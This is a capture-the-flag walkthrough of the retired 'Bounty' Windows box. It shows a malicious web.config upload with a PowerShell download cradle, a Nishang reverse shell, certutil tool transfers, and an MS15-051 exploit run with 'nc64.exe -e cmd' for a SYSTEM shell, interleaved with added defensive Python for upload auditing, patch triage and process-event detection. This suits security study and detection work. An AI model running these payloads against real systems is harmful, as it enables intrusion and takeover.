---
search:
exclude: true
---
# Bounty Writeup
![](img/19.png)
## Introduction :
Bounty is an easy Windows box that was released back in June 2018.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration with **Nmap** to find open ports. We use the flags **-sC** for default scripts and **-sV** to enumerate service versions.

```
λ nihilist [ 93.22.134.89 ] [~] → nmap -sC -sV 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:23 CET
Nmap scan report for 10.10.10.93
Host is up (0.095s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds
```
## **Part 2 : Getting User Access**
Our nmap scan found only port 80 open, so we run a gobuster scan to enumerate the directories we will be able to work with.

```
λ nihilist [ 93.22.134.89 ] [~] → gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/directory-list-2.3-medium.txt

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.93/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2019/11/25 08:28:36 Starting gobuster
=====================================================
/transfer.aspx (Status: 200)
/uploadedFiles (Status: 301)
```

Gobuster found 2 interesting pages:

- /transfer.aspx (which returns a status 200)
- /uploadedFiles (which returns a status 301)
![](prg/19_001.png) ![](prg/19_002.png)
Searching for the keywords **"IIS 7.5 RCE"**, the results tell us that we should be able to get code execution by uploading a **web.config** file.

We will submit our web.config to the upload page and ready our terminal with the nc command and the -lvnp flags in order to catch the incoming connection on our port 9001.
_web.config (the download URL is truncated in the capture; it points at the nihilist.ps1 file served from our machine):_

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('ht>
o = cmd.StdOut.Readall()
Response.write(o)
%>
```
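From the defender's side, the reason this payload works is that the upload directory accepts a file IIS will treat as configuration: it registers a handler that runs `*.config` through asp.dll and removes the request-filtering rules that normally keep web.config unreachable. The following audit function is an added example, not code from the writeup. It parses an uploaded document the way an upload filter might and lists every reason the file must be rejected. The two sample documents are constructed; the ASP body in the malicious one is a harmless placeholder rather than the download cradle above.

```python
"""Audit an uploaded file for the IIS web.config abuse shown above (added example)."""
import xml.etree.ElementTree as ET

CONFIG_END = "</configuration>"

# Constructed sample modelled on the payload above; the ASP body is a placeholder.
MALICIOUS_UPLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
Response.write("placeholder")
%>
"""

# Constructed benign configuration for comparison.
BENIGN_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.webServer>
    <defaultDocument><files><add value="index.aspx" /></files></defaultDocument>
  </system.webServer>
</configuration>
"""


def audit_upload(filename: str, content: str) -> list[str]:
    """Return the reasons an upload is dangerous; an empty list means nothing was found."""
    findings: list[str] = []
    # IIS file names are case-insensitive, so Web.Config is just as effective.
    if filename.lower() == "web.config":
        findings.append("filename is web.config: IIS applies it to the upload directory")
    end = content.find(CONFIG_END)
    if end == -1:
        return findings  # not an IIS configuration document
    xml_part = content[: end + len(CONFIG_END)]
    trailer = content[end + len(CONFIG_END):]
    # The payload keeps the XML well-formed and appends ASP after the root element,
    # so server-side script after </configuration> is itself a red flag.
    if "<%" in trailer:
        findings.append("server-side script block (<% ... %>) follows the XML document")
    try:
        root = ET.fromstring(xml_part)
    except ET.ParseError as exc:
        findings.append(f"malformed XML ({exc}); refusing to trust the file")
        return findings
    # A user-supplied config has no business registering handlers at all.
    for handlers in root.iter("handlers"):
        policy = handlers.get("accessPolicy", "")
        if "Write" in policy:
            findings.append(f"handlers accessPolicy grants Write ({policy})")
        for add in handlers.findall("add"):
            findings.append(
                f"handler maps {add.get('path')} to scriptProcessor {add.get('scriptProcessor')}"
            )
    # Loosening request filtering is how the payload makes itself reachable over HTTP.
    for ext in root.iter("fileExtensions"):
        for rem in ext.findall("remove"):
            findings.append(f"request filtering removed for extension {rem.get('fileExtension')}")
    for seg in root.iter("hiddenSegments"):
        for rem in seg.findall("remove"):
            findings.append(f"hidden segment {rem.get('segment')} made requestable")
    return findings


if __name__ == "__main__":
    for name, body in (("web.config", MALICIOUS_UPLOAD), ("Web.Config", BENIGN_CONFIG)):
        print(name, audit_upload(name, body))
```

The filename check alone is the one that matters most: an upload directory should never accept a file named web.config in any letter case, and ideally should have its own handler mappings cleared so nothing uploaded there is ever executed.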
Our nihilist.ps1 script is a copy of Nishang's [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
_Terminal 1:_

```
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → curl -sk https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > nihilist.ps1
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.48 -Port 9001' >> nihilist.ps1
```

As written above, our nihilist.ps1 script will attempt to send a reverse shell connection to our machine at the address 10.10.14.48, on its port 9001. So we ready our terminal with the nc command and its -lvnp flags in order to catch the incoming connection.

```
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bounty] → nc -lvnp 9001
```
We submit our web.config file
![](prg/19_004.png)
We then browse to it, and then we wait for the reverse shell to come back to our terminal.
_Terminal 1:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
```

_Terminal 2:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9001
```

_Terminal 3:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ curl -vsk http://10.10.10.93/UploadedFiles/web.config
*   Trying 10.10.10.93:80...
* TCP_NODELAY set
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET /UploadedFiles/web.config HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.67.0
> Accept: */*
>
```
_Terminal 1:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.93 - - [02/Dec/2019 08:22:36] "GET /nihilist.ps1 HTTP/1.1" 200 -
```

_Terminal 2:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9001
Connection from 10.10.10.93:49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>
PS C:\windows\system32\inetsrv> whoami
bounty\merlin
```

And we're in! We are logged in as the user merlin, so let's grab the user flag located in C:\users\merlin\desktop.
![](prg/19_005.png)
```
PS C:\windows\system32\inetsrv> cd ../../..
PS C:\> ls

    Directory: C:\

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         5/30/2018   4:14 AM            inetpub
d----         7/14/2009   6:20 AM            PerfLogs
d-r--         6/10/2018   3:43 PM            Program Files
d-r--         7/14/2009   8:06 AM            Program Files (x86)
d-r--         5/31/2018  12:18 AM            Users
d----         5/31/2018  11:37 AM            Windows

PS C:\> cd Users\Merlin
PS C:\Users\Merlin> cd Desktop
PS C:\Users\Merlin\Desktop> more user.txt
e2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```
## **Part 3 : Getting Root Access**
In order to escalate privileges from merlin to the SYSTEM user, we need to first look at the results of the systeminfo command.
_Terminal 1:_

```
PS C:\Users> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          12/2/2019, 8:56:08 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,588 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,595 MB
Virtual Memory: In Use:    500 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93
```
The systeminfo output shows no hotfixes installed on the machine, which is a serious security flaw, so we will attempt to escalate privileges using MS15-051. Keep in mind that we are running a privilege escalation binary on a 64-bit machine, so we need the x64 build. The nc64.exe binary can be downloaded from https://eternallybored.org/misc/netcat/
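The triage done by eye above (release build, no hotfixes) is easy to automate across many hosts. The following is an added example, not code from the writeup: it parses the key/value format systeminfo prints, including the indented `[NN]:` continuation lines under Hotfix(s), and reports the patch-level gaps. Both sample dumps are constructed excerpts in the same shape as the output above; the KB identifiers in the patched sample and the `KB3045171` passed as the required update for MS15-051 are my assumptions and should be checked against the Microsoft bulletin before being relied on.

```python
"""Triage systeminfo output for missing service packs and hotfixes (added example)."""
import re

# Constructed excerpt in the shape of the output above.
SAMPLE_UNPATCHED = """\
Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed counter-example; the KB numbers are assumed values, not taken from the box.
SAMPLE_PATCHED = """\
Host Name:                 FILESRV
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB976932
                           [02]: KB2999226
                           [03]: KB3045171
"""

CONTINUATION = re.compile(r"^\s*\[\d+\]:\s*(.*)$")
VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_systeminfo(text: str) -> dict[str, list[str]]:
    """Map each 'Key:' line to its value plus any [NN]: continuation lines that follow it."""
    info: dict[str, list[str]] = {}
    key = None
    for line in text.splitlines():
        cont = CONTINUATION.match(line)
        if cont and key is not None:
            info[key].append(cont.group(1).strip())
            continue
        if ":" in line:
            # Split on the first colon only; values such as "(UTC+02:00) ..." contain colons too.
            key, _, value = line.partition(":")
            key = key.strip()
            info[key] = [value.strip()] if value.strip() else []
    return info


def installed_hotfixes(info: dict[str, list[str]]) -> list[str]:
    """Hotfix(s) is 'N/A' on an unpatched box, otherwise a count followed by KB lines."""
    return [v for v in info.get("Hotfix(s)", []) if v.upper().startswith("KB")]


def assess(info: dict[str, list[str]], required_kbs: tuple[str, ...] = ()) -> list[str]:
    """Return findings that make the host a candidate for kernel privilege escalation."""
    findings: list[str] = []
    kbs = installed_hotfixes(info)
    if not kbs:
        findings.append("no hotfixes installed: OS is at release level")
    match = VERSION.search(info.get("OS Version", [""])[0])
    if match:
        major, minor, build = (int(x) for x in match.groups())
        # 6.1 is Windows 7 / Server 2008 R2; build 7601 is Service Pack 1.
        if (major, minor) == (6, 1) and build < 7601:
            findings.append(f"build {build} predates Service Pack 1 (7601)")
    for kb in required_kbs:
        if kb not in kbs:
            findings.append(f"{kb} missing")
    return findings


if __name__ == "__main__":
    # KB3045171 is assumed here to be the MS15-051 update for Server 2008 R2; verify it.
    for name, dump in (("unpatched", SAMPLE_UNPATCHED), ("patched", SAMPLE_PATCHED)):
        print(name, assess(parse_systeminfo(dump), ("KB3045171",)))
```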
_Terminal 2:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ wget https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
--2019-12-02 09:07:00--  https://github.com/euphrat1ca/ms15-051/raw/master/ms15-051/ms15-051/x64/ms15-051.exe
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.118.3
Connecting to github.com (github.com)|140.82.118.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe [following]
--2019-12-02 09:07:00--  https://raw.githubusercontent.com/euphrat1ca/ms15-051/master/ms15-051/ms15-051/x64/ms15-051.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55296 (54K) [application/octet-stream]
Saving to: ms15-051.exe

ms15-051.exe        100%[===============================>]  54.00K  --.-KB/s    in 0.06s

2019-12-02 09:07:01 (852 KB/s) - ms15-051.exe saved [55296/55296]

λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
```

Now we just need to pull both the ms15-051.exe and nc64.exe binaries onto the box from our local machine, which is serving them at 10.10.14.48 on port 8000.
_Terminal 1:_

```
PS C:\Users> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
****  Online  ****
CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5)
CertUtil: Access is denied.
```

Let's not forget to download it to a folder on the machine where we have write permissions.

```
PS C:\Users> cd ..
PS C:\> cd Windows
PS C:\Windows> cd temp
```

Now we should be able to download our 2 binaries.

```
PS C:\Windows\temp> certutil -urlcache -f http://10.10.14.48:8000/ms15-051.exe nihilist_privesc.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
```

Our binaries are uploaded! Before we execute the exploit we ready our reverse shell terminal with the same nc command to catch the incoming connection.
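Everything in this part of the writeup leaves a clear trail in process-creation telemetry (Sysmon event 1 or Security event 4688 with command-line logging): an IIS worker process spawning cmd.exe, a PowerShell download cradle, certutil used as a downloader with -urlcache, and a netcat binary launched with -e. The detection logic below is an added example, not code from the writeup, and covers the behaviour from both the web.config stage and this certutil stage. The events are constructed in a simplified record shape and use a TEST-NET address (198.51.100.7) in place of a real host.

```python
"""Rules over process-creation events for the tool-transfer and shell activity above (added example)."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal constructed shape of a process-creation record."""
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Each rule is a name and a predicate over one event. Several rules may fire on one event.
RULES = [
    # The web.config payload runs inside the IIS worker, so the first child is a shell under w3wp.exe.
    ("iis_worker_spawns_shell",
     lambda e: basename(e.parent_image) == "w3wp.exe"
     and basename(e.image) in {"cmd.exe", "powershell.exe"}),
    # certutil fetching an http(s) URL through its cache is a classic living-off-the-land download.
    ("certutil_urlcache_download",
     lambda e: basename(e.image) == "certutil.exe"
     and re.search(r"-urlcache\b.*https?://", e.command_line, re.I) is not None),
    # IEX plus DownloadString/DownloadFile on any command line mentioning powershell.
    ("powershell_download_cradle",
     lambda e: re.search(r"powershell", e.command_line, re.I) is not None
     and re.search(r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile)\b",
                   e.command_line, re.I) is not None),
    # nc.exe / nc64.exe started with -e hands a program's stdio to the remote end.
    ("netcat_command_shell",
     lambda e: re.fullmatch(r"nc(64)?\.exe", basename(e.image)) is not None
     and re.search(r"\s-e\s", e.command_line) is not None),
]


def evaluate(events: list[ProcessEvent]) -> list[tuple[str, str, str]]:
    """Return (rule name, user, command line) for every rule that fires, in event order."""
    hits = []
    for ev in events:
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((name, ev.user, ev.command_line))
    return hits


# Constructed events modelled on the activity in this writeup, plus two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\notepad.exe",
                 "notepad.exe notes.txt", r"BOUNTY\merlin"),
    ProcessEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c powershell -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7:8000/stage.ps1')",
                 r"BOUNTY\merlin"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7:8000/stage.ps1')",
                 r"BOUNTY\merlin"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\certutil.exe",
                 "certutil -urlcache -f http://198.51.100.7:8000/tool.exe tool.exe", r"BOUNTY\merlin"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil -verify server.cer", r"BOUNTY\Administrator"),  # legitimate admin use
    ProcessEvent(r"C:\Windows\Temp\privesc.exe", r"C:\Windows\Temp\nc64.exe",
                 r"c:\windows\temp\nc64.exe -e cmd 198.51.100.7 9999", r"BOUNTY\merlin"),
]


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The parent/child rule is the most robust of the four: the command-line patterns can be obfuscated, but a web server's worker process starting a shell is abnormal regardless of what the command line says.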
_Terminal 2:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9999
```

_Terminal 1:_

```
PS C:\windows\temp> certutil -urlcache -f http://10.10.14.48:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> ls

    Directory: C:\windows\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         6/10/2018   3:44 PM            vmware-SYSTEM
-a---         5/30/2018   3:19 AM          0 DMI5FAC.tmp
-a---         12/2/2019  10:12 AM      55296 nihilist_privesc.exe
-a---         12/2/2019  11:02 AM      43696 nc64.exe
-a---         6/10/2018   3:44 PM     203777 vminst.log
-a---         12/2/2019   8:56 AM      57269 vmware-vmsvc.log
-a---         6/11/2018  12:47 AM      22447 vmware-vmusr.log
-a---         12/2/2019   8:56 AM        910 vmware-vmvss.log

PS C:\windows\temp> ./nihilist_privesc.exe "c:\windows\temp\nc64.exe -e cmd 10.10.14.48 9999"
```
_Terminal 2:_

```
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bounty ]
→ nc -lvnp 9999
Connection from 10.10.10.93:49189
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\windows\temp>whoami
whoami
nt authority\system

C:\windows\temp>cd ..
cd ..

C:\Windows>cd ..
cd ..

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users

05/30/2018  11:18 PM    <DIR>          .
05/30/2018  11:18 PM    <DIR>          ..
05/30/2018  11:18 PM    <DIR>          Administrator
05/30/2018  03:44 AM    <DIR>          Classic .NET AppPool
05/29/2018  11:22 PM    <DIR>          merlin
05/30/2018  04:44 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  11,884,384,256 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

And that's it! We have been able to get a SYSTEM shell on the box and print out the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/19_graph.png)